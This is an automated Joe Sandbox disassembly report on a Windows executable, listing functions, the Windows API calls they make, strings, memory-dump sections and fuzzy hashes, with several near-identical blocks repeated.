                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 0fca4b5a8eb2dadc990c60b72f38773de602d3ef6120de24d2fa20a74a24a50b
                                                                                    • Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
                                                                                    • Opcode Fuzzy Hash: 0fca4b5a8eb2dadc990c60b72f38773de602d3ef6120de24d2fa20a74a24a50b
                                                                                    • Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: b952171228d710f5548ca753f7af7b04102912a81dbb01e154d8fc2b5211550f
                                                                                    • Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
                                                                                    • Opcode Fuzzy Hash: b952171228d710f5548ca753f7af7b04102912a81dbb01e154d8fc2b5211550f
                                                                                    • Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 2316f976ebd558bfefc6c5d2b13a5a581e081a47cfd271eab90a06eb3742c35e
                                                                                    • Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
                                                                                    • Opcode Fuzzy Hash: 2316f976ebd558bfefc6c5d2b13a5a581e081a47cfd271eab90a06eb3742c35e
                                                                                    • Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: c97073bf6442b9f95dfadd859d926e23a7cf7704775c3323a65807a1dd2b7686
                                                                                    • Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
                                                                                    • Opcode Fuzzy Hash: c97073bf6442b9f95dfadd859d926e23a7cf7704775c3323a65807a1dd2b7686
                                                                                    • Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473
                                                                                    APIs
                                                                                    • SetEndOfFile.KERNELBASE(?,0100903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 01009F0C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: File
                                                                                    • String ID:
                                                                                    • API String ID: 749574446-0
                                                                                    • Opcode ID: fdca6560b5ee393511718fac952f18a8c81882639aae0eee3b767886141d7c7f
                                                                                    • Instruction ID: d7a11264a7f8f978e2f0d6a0396ae504948641953a674c100492c999eab91746
                                                                                    • Opcode Fuzzy Hash: fdca6560b5ee393511718fac952f18a8c81882639aae0eee3b767886141d7c7f
                                                                                    • Instruction Fuzzy Hash: 83A0243004400D47DD101730C71400C7710F7117C030001D47007CF051C71F4407CF00
                                                                                    APIs
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0101AE72,C:\Users\user\Desktop,00000000,0104946A,00000006), ref: 0101AC08
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID:
                                                                                    • API String ID: 1611563598-0
                                                                                    • Opcode ID: 74b621d7e204367a8b53cc68256ab3adc079a597a2b0abbeb68be5432d713a69
                                                                                    • Instruction ID: 5b9290ba93f63bd00ba45889395ca824d03d5855e80da6fa2305b001c5dde865
                                                                                    • Opcode Fuzzy Hash: 74b621d7e204367a8b53cc68256ab3adc079a597a2b0abbeb68be5432d713a69
                                                                                    • Instruction Fuzzy Hash: 7FA011302002008B82000A328B8AA0EBAAABFA2B20F00C028A08088020CB3AC820AA00
                                                                                    APIs
                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,010095D6,?,?,?,?,?,01032641,000000FF), ref: 0100963B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: ef4ca47a0d06aa223ec60324e11d54b951d612392cf1208fd3d27fbb49532fb2
                                                                                    • Instruction ID: b699d0f0767de549242a4d9c844c35bdcdb06aac75e9b6efa8171ecaf4f36f53
                                                                                    • Opcode Fuzzy Hash: ef4ca47a0d06aa223ec60324e11d54b951d612392cf1208fd3d27fbb49532fb2
                                                                                    • Instruction Fuzzy Hash: 54F089704C1B159FFB328A68C898792B7E86B16325F041B5ED0EA429E1D775618DCB40
                                                                                    APIs
                                                                                      • Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                                                      • Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0101C2B1
                                                                                    • EndDialog.USER32(?,00000006), ref: 0101C2C4
                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0101C2E0
                                                                                    • SetFocus.USER32(00000000), ref: 0101C2E7
                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0101C321
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0101C358
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0101C36E
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0101C38C
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0101C39C
                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0101C3B8
                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0101C3D4
                                                                                    • _swprintf.LIBCMT ref: 0101C404
                                                                                      • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0101C417
                                                                                    • FindClose.KERNEL32(00000000), ref: 0101C41E
                                                                                    • _swprintf.LIBCMT ref: 0101C477
                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0101C48A
                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0101C4A7
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0101C4C7
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0101C4D7
                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0101C4F1
                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0101C509
                                                                                    • _swprintf.LIBCMT ref: 0101C535
                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0101C548
                                                                                    • _swprintf.LIBCMT ref: 0101C59C
                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0101C5AF
                                                                                      • Part of subcall function 0101AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0101AF35
                                                                                      • Part of subcall function 0101AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0103E72C,?,?), ref: 0101AF84
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                    • API String ID: 797121971-1840816070
                                                                                    • Opcode ID: bec36f016cfc376905c8a3dd537652e2aaf7f8e0e551bc7764c43be41c67ce2e
                                                                                    • Instruction ID: da0a8abd295e4b535dad5a26aebcaac267da91cb0451151e9f7264ebc25dd081
                                                                                    • Opcode Fuzzy Hash: bec36f016cfc376905c8a3dd537652e2aaf7f8e0e551bc7764c43be41c67ce2e
                                                                                    • Instruction Fuzzy Hash: ED917372148345BBE2319AA4DD49FFB7BECEB4A700F044819F7C9DA085D67AE6048762
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 01006FAA
                                                                                    • _wcslen.LIBCMT ref: 01007013
                                                                                    • _wcslen.LIBCMT ref: 01007084
                                                                                      • Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
                                                                                      • Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
                                                                                      • Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00
                                                                                      • Part of subcall function 0100A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641,000000FF), ref: 0100A1F1
                                                                                      • Part of subcall function 0100A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641), ref: 0100A21F
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 01007139
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 01007155
                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 01007298
                                                                                      • Part of subcall function 01009DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,010073BC,?,?,?,00000000), ref: 01009DBC
                                                                                      • Part of subcall function 01009DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 01009E70
                                                                                      • Part of subcall function 01009620: CloseHandle.KERNELBASE(000000FF,?,?,010095D6,?,?,?,?,?,01032641,000000FF), ref: 0100963B
                                                                                      • Part of subcall function 0100A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501
                                                                                      • Part of subcall function 0100A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                    • API String ID: 3983180755-3508440684
                                                                                    • Opcode ID: bf2a26336e1b7b833c00df88e19a8063f102071af744a2875899634320f1289f
                                                                                    • Instruction ID: d468226b18f36b42239ba321f75972b55fbf4c9e34f8fb9fc6045c98d0c20a36
                                                                                    • Opcode Fuzzy Hash: bf2a26336e1b7b833c00df88e19a8063f102071af744a2875899634320f1289f
                                                                                    • Instruction Fuzzy Hash: 58C1B2B1900645AAFB26DB78CC81BEEB7ACBF14300F00455AF9D6E71C1D779B6848B61
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: __floor_pentium4
                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                    • API String ID: 4168288129-2761157908
                                                                                    • Opcode ID: 245d211975a5d105f25307308636134d15ba307f3a7889432b04c623d2897bac
                                                                                    • Instruction ID: 649a79ec5fab2f3b232b8cc015445a4b6726e495beb1da0414bcea7bfc4c180c
                                                                                    • Opcode Fuzzy Hash: 245d211975a5d105f25307308636134d15ba307f3a7889432b04c623d2897bac
                                                                                    • Instruction Fuzzy Hash: C1C24872E086298FDB65CE68DD407EAB7F5EB44304F1441EAD98DE7241E778AE818F40
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog_swprintf
                                                                                    • String ID: CMT$h%u$hc%u
                                                                                    • API String ID: 146138363-3282847064
                                                                                    • Opcode ID: 9530ba0b819ecdbc3288300584fe743c857c2e7d3dc8f941f89c47d554ec5c1e
                                                                                    • Instruction ID: d59c60b1e4a6152a39eefc46e876a1faced6b55a6543b2a301688526d96e63b7
                                                                                    • Opcode Fuzzy Hash: 9530ba0b819ecdbc3288300584fe743c857c2e7d3dc8f941f89c47d554ec5c1e
                                                                                    • Instruction Fuzzy Hash: 9D32A1715106859FFB1ADF74C894AEA3BA5BF15300F0845BDEDCA8F2C2DA74A549CB20
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 01002874
                                                                                    • _strlen.LIBCMT ref: 01002E3F
                                                                                      • Part of subcall function 010102BA: __EH_prolog.LIBCMT ref: 010102BF
                                                                                      • Part of subcall function 01011B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0100BAE9,00000000,?,?,?,00010442), ref: 01011BA0
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01002F91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                    • String ID: CMT
                                                                                    • API String ID: 1206968400-2756464174
                                                                                    • Opcode ID: 7cbd3f1beb7ac275f85b55c301550474d41f695897dc89aadfe2cb9bc5783be8
                                                                                    • Instruction ID: 967554b208251902983a41a48b7a3b27df823c820547e3ec87fb14a6e3c9828b
                                                                                    • Opcode Fuzzy Hash: 7cbd3f1beb7ac275f85b55c301550474d41f695897dc89aadfe2cb9bc5783be8
                                                                                    • Instruction Fuzzy Hash: 6262E4715006458FFB1ADF38C8886EA3BA1BF64300F0845BEEDDA8B2C2DB759545CB60
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0101F844
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0101F910
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0101F930
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0101F93A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: 33dd3e55305a5d974c9f738476a5e3e022fad23c1ac7952bd56bb2e34ccf5dc3
                                                                                    • Instruction ID: 7cc8686e5964e7804ef8269a00d8d5d85b81af89c99ca3cf040891ed4e38ce4b
                                                                                    • Opcode Fuzzy Hash: 33dd3e55305a5d974c9f738476a5e3e022fad23c1ac7952bd56bb2e34ccf5dc3
                                                                                    • Instruction Fuzzy Hash: 27312BB5D4521ADBDB21DFA4D9897CCBBF8BF04304F1040DAE44DAB254EB759A888F44
                                                                                    APIs
                                                                                    • VirtualQuery.KERNEL32(80000000,0101E5E8,0000001C,0101E7DD,00000000,?,?,?,?,?,?,?,0101E5E8,00000004,01061CEC,0101E86D), ref: 0101E6B4
                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0101E5E8,00000004,01061CEC,0101E86D), ref: 0101E6CF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                    • String ID: D
                                                                                    • API String ID: 401686933-2746444292
                                                                                    • Opcode ID: 5e4d1af27fe096fb9a7ffcc892af1d617e293605103f2521ccdce6260a2c90cb
                                                                                    • Instruction ID: f5783f18896788a5adddb61eaed8e0b2581357fd7fceb785b3640053557cd7e8
                                                                                    • Opcode Fuzzy Hash: 5e4d1af27fe096fb9a7ffcc892af1d617e293605103f2521ccdce6260a2c90cb
                                                                                    • Instruction Fuzzy Hash: 2101D4326001096BEB24DE29DC49ADD7BEABFC4224F0CC160ED99DB148D638D9058680
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 01028FB5
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 01028FBF
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 01028FCC
                                                                                    Memory Dump Source
